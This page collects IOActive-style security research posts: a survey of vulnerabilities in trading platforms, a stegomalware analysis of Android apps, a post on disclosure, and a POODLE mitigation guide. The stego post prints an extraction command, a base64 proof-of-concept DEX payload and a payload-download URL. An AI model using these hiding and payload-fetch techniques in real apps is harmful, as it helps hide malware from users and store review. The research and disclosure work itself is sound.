RESEARCH | August 7, 2018

Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies

This blog post contains a small portion of the entire analysis. Please refer to the white paper for full details to the research.

Disclaimer

Most of the testing was performed using paper money (demo accounts) provided online by the brokerage houses. Only a few accounts were funded with real money for testing purposes. In the case of commercial platforms, the free trials provided by the brokers were used. Only end-user applications and their direct servers were analyzed. Other backend protocols and related technologies used in exchanges and financial institutions were not tested.

This research is not about High Frequency Trading (HFT), blockchain, or how to get rich overnight.

Introduction

The days of open outcry on trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.

stock trading firm

The valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.

Brokerage houses offer trading platforms to operate in the market. These applications allow you to do things including, but not limited to:

  • Fund your account via bank transfers or credit card
  • Keep track of your available equity and buying power (cash and margin balances)
  • Monitor your positions (securities you own) and their performance (profit)
  • Monitor instruments or indexes
  • Send buy/sell orders
  • Create alerts or triggers to be executed when certain thresholds are reached
  • Receive real-time news or video broadcasts
  • Stay in touch with the trading community through social media and chats

Needless to say, every single item on the previous list must be kept secret and only known by and shown to its owner.

Scope

My analysis started mid-2017 and concluded in July 2018. It encompassed the following platforms; many of them are some of the most used and well-known trading platforms, and some allow cryptocurrency trading:

  • 16 Desktop applications
  • 34 Mobile apps
  • 30 Websites

These platforms are part of the trading solutions provided by the following brokers, which are used by tens of millions of traders. Some brokers offer the three types of platforms, however, in some cases only one or two were reviewed due to certain limitations:

  • Ally Financial
  • AvaTrade
  • Binance
  • Bitfinex
  • Bitso
  • Bittrex
  • Bloomberg
  • Capital One
  • Charles Schwab
  • Coinbase
  • easyMarkets
  • eSignal
  • ETNA
  • eToro
  • E-TRADE
  • ETX Capital
  • ExpertOption
  • Fidelity
  • Firstrade
  • FxPro
  • GBMhomebroker
  • Grupo BMV
  • IC Markets
  • Interactive Brokers
  • IQ Option
  • Kraken
  • com
  • Merrill Edge
  • MetaTrader
  • Net
  • NinjaTrader
  • OANDA
  • Personal Capital
  • Plus500
  • Poloniex
  • Robinhood
  • Scottrade
  • TD Ameritrade
  • TradeStation
  • Yahoo! Finance

Devices used:

  • Windows 7 (64-bit)
  • Windows 10 Home Single (64-bit)
  • iOS 10.3.3 (iPhone 6) [not jailbroken]
  • iOS 10.4 (iPhone 6) [not jailbroken]
  • Android 7.1.1 (Emulator) [rooted]

Basic security controls/features were reviewed that represent just the tip of the iceberg when compared to more exhaustive lists of security checks per platform.

Results

Unfortunately, the results proved to be much worse compared with applications in retail banking. For example, mobile apps for trading are less secure than the personal banking apps reviewed in 2013 and 2015.

Apparently, cybersecurity has not been on the radar of the Financial Services Tech space in charge of developing trading apps. Security researchers have disregarded these technologies as well, probably because of a lack of understanding of money markets.

While testing I noted a basic correlation: the biggest brokers are the ones that invest more in fintech cybersecurity. Their products are more mature in terms of functionality, usability, and security.

Based on my testing results and opinion, the following trading platforms are the most secure:

Broker Platforms
TD Ameritrade Web and mobile
Charles Schwab Web and mobile
Merrill Edge Web and mobile
MetaTrader 4/5 Desktop and mobile
Yahoo! Finance Web and mobile
Robinhood Web and mobile
Bloomberg Mobile
TradeStation Mobile
Capital One Mobile
FxPro cTrader Desktop
IC Markets cTrader Desktop
Ally Financial Web
Personal Capital Web
Bitfinex Web and mobile
Coinbase Web and mobile
Bitso Web and mobile

The medium- to high-risk vulnerabilities found on the different platforms include full or partial problems with encryption, Denial of Service, authentication, and/or session management problems. Despite the fact that these platforms implement good security features, they also have areas that should be addressed to improve their security.

Following the platforms I consider must improve in terms of security:

Broker Platforms
Interactive Brokers Desktop, web and mobile
IQ Option Desktop, web and mobile
AvaTrade Desktop and mobile
E-TRADE Web and mobile
eSignal Desktop
TD Ameritrade’s Thinkorwim Desktop
Charles Schwab Desktop
TradeStation Desktop
NinjaTrader Desktop
Fidelity Web
Firstrade Web
Plus500 Web
Markets.com Mobile

Unencrypted Communications

In 9 desktop applications (64%) and in 2 mobile apps (6%), transmitted data unencrypted was observed. Most applications transmit most of the sensitive data in an encrypted way, however, there were some cases where cleartext data could be seen in unencrypted requests.

Among the data seen unencrypted are passwords, balances, portfolio, personal information and other trading-related data. In most cases of unencrypted transmissions, HTTP in plaintext was seen, and in others, old proprietary protocols or other financial protocols such as FIX were used.

Under certain circumstances, an attacker with access to some part of the network, such as the router in a public WiFi, could see and modify information transmitted to and from the trading application. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.

For example, the follow application uses unencrypted HTTP. In the screenshot, a buy order:

Another interesting example was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data. During the testing, it was noted that Data Manager authenticates over an unencrypted protocol on the TCP port 2189, apparently developed in 1999.

As can be seen, the copyright states it was developed in 1999 by Data Broadcasting Corporation. Doing a quick search, we found a document from the SEC that states the company changed its name to Interactive Data Corporation, the owners of eSignal. In other words, it looks like it is an in-house development created almost 20 years ago. We could not corroborate this information, though.

The main eSignal login screen also authenticates through a cleartext channel:

FIX is a protocol initiated in 1992 and is one of the industry standard protocols for messaging and trade execution. Currently, it is used by a majority of exchanges and traders. There are guidelines on how to implement it through a secure channel, however, the binary version in cleartext was mostly seen. Tests against the protocol itself were not performed in this analysis.

A broker that supports FIX:

There are some cases where the application encrypts the communication channel, except in certain features. For instance, Interactive Brokers desktop and mobile applications encrypt all the communication, but not that used by iBot, the robot assistant that receives text or voice commands, which sends the instructions to the server embedded in a FIX protocol message in cleartext:

News related to the positions were also observed in plaintext:

Another instance of an application that uses encryption but not for certain channels is this one, Interactive Brokers for Android, where a diagnostics log with sensitive data is sent to the server in a scheduled basis through unencrypted HTTP:

A similar platform that sends everything over HTTPS is IQ Option, but for some reason, it sends duplicate unencrypted HTTP requests to the server disclosing the session cookie.

Others appear to implement their own binary protocols, such as Charles Schwab, however, symbols in watchlists or quoted symbols could be seen in cleartext:

Interactive Brokers supports encryption but by default uses an insecure channel; an inexperienced user who does not know the meaning of “SSL” (Secure Socket Layer) won’t enable it on the login screen and some sensitive data will be sent and received without encryption:

Passwords Stored Unencrypted

In 7 mobile apps (21%) and in 3 desktop applications (21%), the user’s password was stored unencrypted in a configuration file or sent to log files. Local access to the computer or mobile device is required to extract them, though. This access could be either physical or through malware.

In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it’s relatively easily), log in through the web-based trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most web platforms (+75%) support two-factor authentication (2FA), however, it’s not enabled by default, the user must go to the configuration and enable it to receive authorization codes by text messages or email. Hence, if 2FA is not enabled in the account, it’s possible for an attacker, that knows the password already, to link a new bank account and withdraw the money from sold securities.

The following are some instances where passwords are stored locally unencrypted or sent to logs in cleartext:

Base64 is not encryption:

In some cases, the password was sent to the server as a GET parameter, which is also insecure:

One PIN for login and unlocking the app was also seen:

In IQ Option, the password was stored completely unencrypted:

However, in a newer version, the password is encrypted in a configuration file, but is still stored in cleartext in a different file:

Trading and Account Information Stored Unencrypted

In the trading context, operational or strategic data must not be stored unencrypted nor sent to the any log file in cleartext. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.

8 desktop applications (57%) and 15 mobile apps (44%) sent sensitive data in cleartext to log files or stored it unencrypted. Local access to the computer or mobile device is required to extract this data, though. This access could be either physical or through malware.

If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.

The following screenshots show applications that store sensitive data unencrypted:

Balances:

Investment portfolio:

Buy/sell orders:

Watchlists:

Recently quoted symbols:

Other data:

Trading Programming Languages with DLL Import Capabilities

This is not a bug, it’s a feature. Some trading platforms allow their customers to create their own automated trading robots (a.k.a. expert advisors), indicators, and other plugins. This is achieved through their own programming languages, which in turn are based on other languages, such as C++, C#, or Pascal.

The following are a few of the trading platforms with their own trading language:

  • MetaTrader: MetaQuotes Language (Based on C++ – Supports DLL imports)
  • NinjaTrader: NinjaScript (Based on C# – Supports DLL imports)
  • TradeStation: EasyLanguage (Based on Pascal – Supports DLL imports)
  • AvaTraceAct: ActFX (Based on Pascal – Does not support OS commands nor DLL imports)
  • (FxPro/IC Markets) cTrader: Based on C# (OS command and DLL support is unknown)

Nevertheless, some platforms such as MetaTrader warn their customers about the dangers related to DLL imports and advise them to only execute plugins from trusted sources. However, there are Internet tutorials claiming, “to make you rich overnight” with certain trading robots they provide. These tutorials also give detailed instructions on how to install them in MetaTrader, including enabling the checkbox to allow DLL imports. Innocent non-tech savvy traders are likely to enable such controls, since not everyone knows what a DLL file is or what is being imported from it. Dangerous.

Following a malicious Ichimoku indicator that, when loaded into any chart, downloads and executes a backdoor for remote access:

Another basic example is NinjaTrader, which simply allows OS commands through C#’s System.Diagnostics.Process.Start(). In the following screenshot, calc.exe executed from the chart initialization routine:

Denial of Service

Many desktop platforms integrate with other trading software through common TCP/IP sockets. Nevertheless, some common weaknesses are present in the connections handling of such services.

A common error is not implementing a limit of the number of concurrent connections. If there is no limit of concurrent connections on a TCP daemon, applications are susceptible to denial-of-service (DoS) or other type of attacks depending on the nature of the applications.

For example, TD Ameritrade’s Thinkorswim TCP-Orders Server listens on the TCP port 2000 in the localhost interface, and there is no limit for connections nor a waiting time between orders. This leads to the following problems:

  • Memory leakage since, apparently, the resources assigned to every connection are not freed upon termination.
  • Continuous order pop-ups (one pop-up per order received through the TCP server) render the application useless.
  • A NULL pointer dereference is triggered and an error report (.zip file) is created.

Regardless, it listens on the local interface only. There are different ways to reach this port, such as XMLHttpRequest() in JavaScript through a web browser.

Memory leakage could be easily triggered by creating as many connections as possible:

A similar DoS vulnerability due to memory exhaustion was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data; therefore, availability is the most important asset:

It’s recommended to implement a configuration item to allow the user to control the behavior of the TCP order server, such as controlling the maximum number of orders sent per minute as well as the number of seconds to wait between orders to avoid bottlenecks.

The following capture from Interactive Brokers shows when this countermeasure is implemented properly. No more than 51 users can be connected simultaneously:

Session Still Valid After Logout

Normally, when the logout button is pressed in an app, the session is finished on both sides: server and client. Usually the server deletes the session token from its valid session list and sends a new empty or random value back to the client to clear or overwrite the session token, so the client needs to reauthenticate next time.

In some web platforms such as E-TRADE, Charles Schwab, Fidelity and Yahoo! Finance (Fixed), the session was still valid one hour after clicking the logout button:

Authentication

While most web-based trading platforms support 2FA (+75%), most desktop applications do not implement it to authenticate their users, even when the web-based platform from the same broker supports it.

Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only 8 apps (24%) do not implement this feature.

Unfortunately, using the fingerprint database in the phone has a downside:

Weak Password Policies

Some institutions let the users choose easily guessable passwords. For example:

The lack of a secure password policy increases the chances that a brute-force attack will succeed in compromising user accounts.

In some cases, such as in IQ Option and Markets.com, the password policy validation is implemented on the client-side only, hence, it is possible to intercept a request and send a weak password to the server:

Automatic Logout/Lockout for Idle Sessions

Most web-based platforms logout/lockout the user automatically, but this is not the case for desktop (43%) and mobile apps (25%). This is a security control that forces the user to authenticate again after a period of idle time.

Privacy Mode

This mode protects the customers’ private information from being displayed on the screen in public areas where shoulder-surfing attacks are feasible. Most of the mobile apps, desktop applications, and web platforms do not implement this useful and important feature.

The following images show before and after enabling privacy mode in Thinkorswim for mobile:

Hardcoded Secrets in Code and App Obfuscation

16 Android .apk installers (47%) were easily reverse engineered to human-readable code since they lack of obfuscation. Most Java and .NET-based desktop applications were also reverse-engineered easily. The rest of the applications had medium to high levels of obfuscation, such as Merrill Edge in the next screenshot.

The goal of obfuscation is to conceal the applications purpose (security through obscurity) and logic in order to deter reverse engineering and to make it more difficult.

In the non-obfuscated platforms, there are hardcoded secrets such as cryptographic keys and third-party service partner passwords. This information could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:

Interestingly, 14 of the mobile apps (41%) and 4 of the desktop platforms (29%) have traces (hostnames and IPs) about the internal development and testing environments where they were made or tested. Some hostnames are reachable from the Internet and since they’re testing systems they could lack of proper protections.

SSL Certificate Validation

11 of the reviewed mobile apps (32%) do not check the authenticity of the remote endpoint by verifying its SSL certificate; therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require to trick the user into installing a malicious certificate on their phones, though.

The ones that verify the certificate normally do not transmit any data, however, only Charles Schwab allows the user to use the app with the provided certificate:

Lack of Anti-exploitation Mitigations

ASLR randomizes the virtual address space locations of dynamically loaded libraries. DEP disallows the execution of data in the data segment. Stack Canaries are used to identify if the stack has been corrupted. These security features make much more difficult for memory corruption bugs to be exploited and execute arbitrary code.

The majority of the desktop applications do not have these security features enabled in their final releases. In some cases, that these features are only enabled in some components, not the entire application. In other cases, components that handle network connections also lack these flags.

Linux applications have similar protections. IQ Option for Linux does not enforce all of them on certain binaries.

Other Weaknesses

More issues were found in the platforms. For more details, please refer to the white paper. 

Statistics

Since a picture is worth a thousand words, consider the following graphs:

For more statistics, please refer to the white paper.

Responsible Disclosure

One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure. In September 2017 we sent a detailed report to 13 of the brokerage firms whose mobile trading apps presented some of the higher risks vulnerabilities discussed in this paper. More recently, between May and July 2018, we sent additional vulnerability reports to brokerage firms.

As of July 27, 2018, 19 brokers that have medium- or high-risk vulnerabilities in any of their platforms were contacted.

TD Ameritrade and Charles Schwab were the brokers that communicated more with IOActive for resolving the reported issues.

For a table with the current status of the responsible disclosure process, please refer to the white paper.

Conclusions and Recommendations

  • Trading platforms are less secure than the applications seen in retail banking.
  • There’s still a long way to go to improve the maturity level of security in trading technologies.
  • End users should enable all the security mechanisms their platforms offer, such as 2FA and/or biometric authentication and automatic lockout/logout. Also, it’s recommended not to trade while connected to public networks and not to use the same password for other financial services.
  • Brokerage firms should perform regular internal audits to continuously improve the security of their trading platforms.
  • Brokerage firms should also offer security guidance in their online education centers.
  • Developers should analyze their current applications to determine if they suffer from the vulnerabilities described in this paper, and if so, fix them.
  • Developers should design new, more secure financial software following secure coding practices.
  • Regulators should encourage brokers to implement safeguards for a better trading environment. They could also create trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
  • Rating organizations should include security in their reviews.

Side Note

Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.

With nothing left to say, I wish you happy and secure trading!

Thanks for reading,

Alejandro
@nitr0usmx

This blog post contains a small portion of the entire analysis.
Please refer to the white paper.

RESEARCH | September 22, 2015

Is Stegomalware in Google Play a Real Threat?

For several decades, the science of steganography has been used to hide malicious code (useful in intrusions) or to create covert channels (useful in information leakage). Nowadays, steganography can be applied to almost any logical/physical medium (format files, images, audio, video, text, protocols, programming languages, file systems, BIOS, etc.). If the steganographic algorithms are well designed, the hidden information is really difficult to detect. Detecting hidden information, malicious or not, is so complex that the study of steganalytic algorithms (detection) has been growing. You can see the growth in scientific publications (source: Scholar Google) and research investment by governments or institutions.
In fact, since the attacks on September 11, 2001, there has been a lot of discussion on the possibility of terrorists using this technology. See:
 
 
 
 
In this post, I would like to illustrate steganography’s ability to hide data in Android applications. In this experiment, I focus on Android applications published in Google Play, leaving aside alternative markets with lower security measures, where it is easier to introduce malicious code.
 
 
Is it possible to hide information on Google Play or in the Android apps released in it?
 
The answer is easy: YES! Simple techniques have been documented, from hiding malware by renaming the file extension (Android / tr DroidCoupon.A – 2011, Android / tr SmsZombie.A – 2012, Android / tr Gamex.A – 2013) to more sophisticated procedures (AngeCryption – BlackHat Europe October2014).
 
Let me show some examples in more depth:
 
 
Google Play Web (https://play.google.com)
 
Google Play includes a webpage for each app with information such as a title, images, and a text description. Each piece of information could conceal data using steganography (linguistic steganography, image steganography, etc.). In fact, I am going to “work” with digital images and demonstrate how Google “works” when there is hidden information inside of files.
 
To do this, I will use two known steganographic techniques: adding information to the end of file (EOF) and hiding information in the least significant bit (LSB) of each pixel of the image.
      
 
          PNG Images
 
You can upload PNG images to play.google.com that hide information using EOF or LSB techniques. Google does not remove this information.
 
For example, I created a sample app (automatically generated – https://play.google.com/store/apps/details?id=com.wMyfirstbaskeballgame) and uploaded several images (which you can see on the web) with hidden messages. In one case, I used the OpenStego steganographic tool (http://www.openstego.com/) and in another, I added the information at the end of an image with a hex editor.
 
The results can be seen by performing the following steps (analyzing the current images “released” on the website):
Example 1: PNG with EOF
 
 
Step 2: Loot at the end of the file 🙂
Example 2: PNG with LSB
 
 
Step 2: Recover the hidden information using Openstego (key=alfonso)
 
JPEG Images
If you try to upload a steganographic JPEG image (EOF or LSB) to Google Play, the hidden information will be removed. Google reprocesses the image before publishing it. This does not necessarily mean that it is not possible to hide information in this format. In fact, in social networks such as Facebook, we can “avoid” a similar problem with Secret Book or similar browser extensions. I’m working on it…
 
https://chrome.google.com/webstore/detail/secretbook/plglafijddgpenmohgiemalpcfgjjbph?hl=en-GB
 
In summary, based on the previous proofs, I can say that Google Play allows information to be hidden in the images of each app. Is this useful? It could be used to exchange hidden information (covert channel using the Google Play). The main question is whether an attacker could use information masked for some evil purpose. Perhaps they could use images to encode executable code that “will exploit” when you are visiting the web (using for example polyglots + stego exploits) or another idea. Time will tell…
 
 
 
APK Steganography
 
Applications uploaded toGoogle Play are not modified by the market. That is, an attacker can use any of the existing resources in an APK to hide information, and Google does not remove that information. For example, machine code (DEX), PNG, JPEG, XML, and so on.
 
 
Could it be useful to hide information on those resources?
 
An attacker might want to conceal malicious code on these resources and hinder automatic detection (static and dynamic analysis) that focuses on the code (DEX). A simple example would be an application that hides a specific phone number in an image (APT?).
 
The app verifies the phone number, and after a few clicks in a specific screen on a mobile phone, checks if the number is equal to that stored in the picture. If the numbers match, you can start leaking information (depending on the permissions allowed in the application).
 
I want to demonstrate the potential of Android stegomalware with a PoC. Instead of developing it, I will analyze an active sample that has been on Google Play since June 9, 2014. This stegomalware was developed by researchers at Universidad Carlos III de Madrid, Spain (http://www.uc3m.es). This PoC hides a DEX file (executable code) in an image (resource) of the main app. When the app is running, and the user performs a series of actions, the image recovers the “new” DEX file. This code runs and connects to a URL with a payload (in this case harmless). The “bad” behavior of this application can only be detected if we analyze the resources of the app in detail or simulate the interaction the app used for triggering the connection to the URL.
 
Let me show how this app works (static manual analysis):
Step 1: Download the APK to our local store. This requires a tool, such as an APK downloader extension or a specific web as http://apps.evozi.com/apk-downloader/
Step 2. Unzip the APK (es.uc3m.cosec.likeimage.apk)
Step 3. Using the Stegdetect steganalytic tool (https://github.com/abeluck/stegdetect) we can detect hidden information in the image “likeimage.jpg”. The author used the F5 steganographic tool (https://code.google.com/p/f5-steganography/).
 
es.uc3m.cosec.likeimageresdrawable-hdpilikeimage.jpg
likeimage.jpg : f5(***)
Step 4. To analyze (reverse engineer) what the app is doing with this image, I use the dex2jar and jd tools.
Step 5. Analyzing the code, we can observe the key used to hide information in the image. We can recover the hidden content to a file (bicho.dex).
java -jar f5.jar x -p cosec -e bicho.dex likeimage.jpg
 
Step 6. Analyzing the new file (bicho.dex), we can observe the connection to http://cosec-uc3m.appspot.com/likeimage for downloading a payload.
 
Step 7. Analyzing the code and payload, we can demonstrate that it is inoffensive.
ZGV4CjAzNQDyUt1DKdvkkcxqN4zxwc7ERfT4LxRA695kAgAAcAAAAHhWNBIAAAAAAAAAANwBAAAKAAAAcAAAAAQAAACYAAAAAgAAAKgAAAAAAAAAAAAAAAMAAADAAAAAAQAAANgAAABsAQAA+AAAACgBAAAwAQAAMwEAAD0BAABRAQAAZQEAAKUBAACyAQAAtQEAALsBAAACAAAAAwAAAAQAAAAHAAAAAQAAAAIAAAAAAAAABwAAAAMAAAAAAAAAAAABAAAAAAAAAAAACAAAAAEAAQAAAAAAAAAAAAEAAAABAAAAAAAAAAYAAAAAAAAAywEAAAAAAAABAAEAAQAAAMEBAAAEAAAAcBACAAAADgACAAEAAAAAAMYBAAADAAAAGgAFABEAAAAGPGluaXQ+AAFMAAhMTUNsYXNzOwASTGphdmEvbGFuZy9PYmplY3Q7ABJMamF2YS9sYW5nL1N0cmluZzsAPk1BTElDSU9VUyBQQVlMT0FEIEZST00gVEhFIE5FVDogVGhpcyBpcyBhIHByb29mIG9mIGNvbmNlcHQuLi4gAAtNQ2xhc3MuamF2YQABVgAEZ2V0UAAEdGhpcwACAAcOAAQABw4AAAABAQCBgAT4AQEBkAIAAAALAAAAAAAAAAEAAAAAAAAAAQAAAAoAAABwAAAAAgAAAAQAAACYAAAAAwAAAAIAAACoAAAABQAAAAMAAADAAAAABgAAAAEAAADYAAAAASAAAAIAAAD4AAAAAiAAAAoAAAAoAQAAAyAAAAIAAADBAQAAACAAAAEAAADLAQAAABAAAAEAAADcAQAA
 
The code that runs the payload:
 
Is Google detecting these “stegomalware”?
 
Well, I don’t have the answer. Clearly, steganalysis science has its limitations, but there are other ways to monitor strange behaviors in each app. Does Google do it? It is difficult to know, especially if we focus on “mutant” applications. Mutant applications are applications whose behavior could easily change. Detection would require continuous monitoring by the market. For example, for a few months I have analyzed a special application, including its different versions and the modifications that have been published, to observe if Google does anything with it. I will show the details:
Step 1. The mutant app is “Holy Quran video and MP3” (tr.com.holy.quran.free.apk). Currently at https://play.google.com/store/apps/details?id=tr.com.holy.quran.free

Step 2.  Analyzing the current and previous version of this app, I discover connections to specific URLs (images files). Are these truly images? Not all.

Step 3. Two URLs that the app connects to are very interesting. In fact, they aren’t images but SQLite databases (with messages in Turkish). This is the trivial steganography technique of simply renaming the file extension. The author changed the content of these files:

Step 4. If we analyze these databases, it is possible to find curious messages. For example, recipes with drugs.

Is Google aware of the information exchanged using their applications? This example does not cease to be a mere curiosity, but such procedures might violate the policy of publication of certain applications on the market or more serious things.
 
Figure: Recipes inside the file io.png (SQLite database)

In summary, this small experiment shows that we can hide information on Google Play and Android apps in general. This feature can be used to conceal data or implement specific actions, malicious or not. Only the imagination of an attacker will determine how this feature will be used…


Disclaimer: part of this research is based on a previous research by the author at ElevenPaths
INSIGHTS | May 11, 2015

Vulnerability disclosure the good and the ugly

I can’t believe I continue to write about disclosure problems. More than a decade ago, I started disclosing vulnerabilities to vendors and working with them to develop fixes. Since then, I have reported hundreds of vulnerabilities. I often think I have seen everything, and yet, I continue to be surprised over and over again. I wrote a related blog post a year and a half ago (Vulnerability bureaucracy: Unchanged after 12 years), and I will continue to write about disclosure problems until it’s no longer needed.

 

Everything is becoming digital. Vendors are producing software for the first time or with very little experience, and many have no security knowledge. As a result, insecure software is being deployed worldwide. The Internet of Things (IoT), industrial devices and industrial systems (SCADA/ICS), Smart City technology, automobile systems, and so on are insecure and getting worse instead of better.

 

Besides lacking of security knowledge, many vendors do not know how to deal with vulnerability reports. They don’t know what to do when an individual researcher or company privately discloses a vulnerability to them, how to properly communicate the problem, or how to fix it. Many vendors haven’t planned for security patches. Basically, they never considered the possibility of a latent security flaw. This creates many of the problems the research community commonly faces.

 

When IOActive recently disclosed vulnerabilities in CyberLock products, we faced problems, including threats from CyberLock’s lawyers related to the Digital Millennium Copyright Act (DMCA). CyberLock’s response is a very good example of a vendor that does not know how to properly deal with vulnerability reports.

 

On the other hand, we had a completely different experience when we recently reported vulnerabilities to Lenovo. Lenovo’s response was very professional and collaborative. They even publicly acknowledged our collaboration:

 

“Lenovo’s development and security teams worked directly with IOActive regarding their System Update vulnerability findings, and we value their expertise in identifying and responsibly reporting them.”

Source: http://www.absolutegeeks.com/2015/05/06/round-2-lenovo-is-back-in-the-news-for-a-new-security-risk-in-their-computers (no longer active)

IOActive approached both cases in the same way, but with two completely different reactions and results.

 

We always try to contact the affected vendor through a variety of channels and offer our collaboration to ensure a fix is in place before we disclose our research to the public. We invest a lot of time and resources to helping vendors understand the vulnerabilities we find. We have calls with developers and managers, test their fixes, and so on, all for free without expecting anything in return. We do not propose nor discuss business opportunities; our only motive is to see that the vulnerabilities get fixed. We have a great track record; we’ve reported dozens of vulnerabilities and collaborated with many vendors and CERTs too.

 

When a vendor is nonresponsive, we feel that the best solution is usually to disclose the vulnerability to the public. We do this as a last resort, as no vendor patch or solution will be available in such a case. We do not want to be complicit in hiding a flaw. Letting people know can force the vendor to address the vulnerability.

Dealing with vulnerability reports shouldn’t be this difficult. I’m going to give some advice, based on my experience, to help companies avoid vulnerability disclosure problems and improve the security of their products:

 

  • Clearly display a contact email for vulnerability reports on the company/product website
  • Continuously monitor that email address and instantly acknowledge when you get a vulnerability report
  • Agree on response procedures including regular timeframes for updating status information after receiving the report
  • Always be collaborative with the researcher/company, even if you don’t like the reporter
  • Always thank the researcher/company for the report, even if you don’t like the reporter
  • Ask the reporter for help if needed, and work together with the reporter to find better solutions
  • Agree on a time for releasing a fix
  • Agree on a time for publicly disclosing the vulnerability
  • Release the fix on time and alert customers

That’s it! Not so difficult. Any company that produces software should follow these simple guidelines at a minimum.

It comes down to this: If you produce software, consider the possibility that your product will have security vulnerabilities and plan accordingly. You will do yourself a big favor, save money, and possibly save your company’s reputation too.
RESEARCH | October 17, 2014

Vicious POODLE Finally Kills SSL

The poodle must be the most vicious dog, because it has killed SSL.

 

POODLE is the latest in a rather lengthy string of vulnerabilities in SSL (Secure Socket Layer) and a more recent protocol, TLS (Transport layer Security). Both protocols secure data that is being sent between applications to prevent eavesdropping, tampering, and message forgery.

POODLE (Padding Oracle On Downgraded Legacy Encryption) rings the death knell for our 18-year-old friend SSL version 3.0 (SSLv3), because at this point, there is no truly safe way to continue using it.

Google announced Tuesday that its researchers had discovered POODLE. The announcement came amid rumors about the researchers’ security advisory white paper which details the vulnerability, which was circulating internally.

SSLv3 had survived numerous prior vulnerabilities, including SSL renegotiation, BEAST, CRIME, Lucky 13, and RC4 weakness. Finally, its time has come; SSLv3 is long overdue for deprecation.

The security industry’s initial view is that POODLE will not be as devastating as other recent vulnerabilities such as Heartbleed, a TLS bug. After all, POODLE is a client-side attack; the others were direct server-side attacks.

However, I believe POODLE will ultimately have a larger overall impact than Heartbleed. Even the hundreds of thousands of applications that use a more recent TLS protocol still use SSLv3 as part of backward compatibility. In addition, some applications that directly use SSLv3 may not support any version of TLS; for these, there might not be a quick fix, if there will be one at all.


POODLE attacks the SSLv3 block ciphers by abusing the non-deterministic nature of block cipher padding of CBC ciphers. The Message Authentication Code (MAC), which checks the integrity of every message after decryption, does not cover these padding bytes. What does this mean? The padding can’t be fully verified. In other words, this attack is very capable of determining the value of HTTPS cookies. This is the heart of the problem. That might not seem like a huge issue until you consider that this may be a session cookie, and the user’s session could be potentially compromised.

TLS version 1.0 (TLSv1.0) and higher versions are not affected by POODLE because these protocols are strict about the contents of the padding bytes. Therefore, TLSv1.0 is still considered safe for CBC mode ciphers. However, we shouldn’t let that lull us into complacency. Keep in mind that even the clients and servers that support recent TLS versions can force the use of SSLv3 by downgrading the transmission channel, which is often still supported. This ‘downgrade dance’ can be triggered through a variety of methods. What’s important to know is that it can happen.

There are a few ways to prevent POODLE from affecting your communication:

Plan A: Disable SSLv3 for all applications. This is the most effective mitigation for both clients and servers.

Plan B: As an alternative, you could disable all CBC Ciphers for SSLv3. This will protect you from POODLE, but leaves only RC4 as the remaining “strong” cryptographic ciphers, which as mentioned above has had weaknesses in the past.

Plan C: If an application must continue supporting SSLv3 in order work correctly, implement the TLS_FALLBACK_SCSV mechanism. Some vendors are taking this approach for now, but it is a coping technique, not a solution. It addresses problems with retried connections and prevents reversion to earlier protocols, as described in the document TLS Fallback Signaling Cipher Suite Value for Preventing Protocol Downgrade Attacks (Draft Released for Comments).

How to Implement Plan A

 

 

 

With no solution that would allow truly safe continued use of SSLv3, you should implement Plan A: Disable SSLv3 for both server and client applications wherever possible, as described below.

Disable SSLv3 for Browsers

 

 

 

 

Browser
 Disabling instructions
Chrome:
Add the command line -ssl-version-min=tls1 so the browser uses TLSv1.0 or higher.
Internet: Explorer:
Go to IE’s Tools menu -> Internet Options -> Advanced tab. Near the bottom of the tab, clear the Use SSL 3.0 checkbox.
Firefox:
Type about:config in the address bar and set security.tls.version.min to 1.
Adium/Pidgin:
 Clear the Force Old-Style SSL checkbox.

Note: Some browser vendors are already issuing patches and others are offering diagnostic tools to assess connectivity.

If your device has multiple users, secure the browsers for every user. Your mobile browsers are vulnerable as well.

Disable SSLv3 on Server Software

 

 

 

 
Server Software 
   Disabling instructions
Apache:
Add -SSLv3 to the SSLProtocol line.
IIS 7:
Because this is an involved process that requires registry tweaking and a reboot, please refer to Microsoft’s instructions: https://support.microsoft.com/kb/187498/en-us
Postfix:
In main.cf, adopt the setting smtpd_tls_mandatory_protocols=!SSLv3 and  ensure that !SSLv2 is present too.

Stay alert for news from your application vendors about patches and recommendations.

POODLE is a high risk for payment gateways and other applications that might expose credit card data and must be fixed in 30 days, according to Payment Card Industry standards. The clock is ticking.

 

 

Conclusion

 

 

 

 

Ideally, the security industry should move to recent versions of the TLS protocol. Each iteration has brought improvements, yet adoption has been slow. For instance, TLS version 1.2, introduced in mid-2008, was scarcely implemented until recently and many services that support TLSv1.2 are still required to support the older TLSv1.0, because the clients don’t yet support the newer protocol version.

A draft of TLS version 1.3 released in July 2014 removes support for features that were discovered to make encrypted data vulnerable. Our world will be much safer if we quickly embrace it.

Robert Zigweid

 

 

References 
PRESENTATION | July 30, 2014

DC22 Talk: Killing the Rootkit

By Shane Macaulay

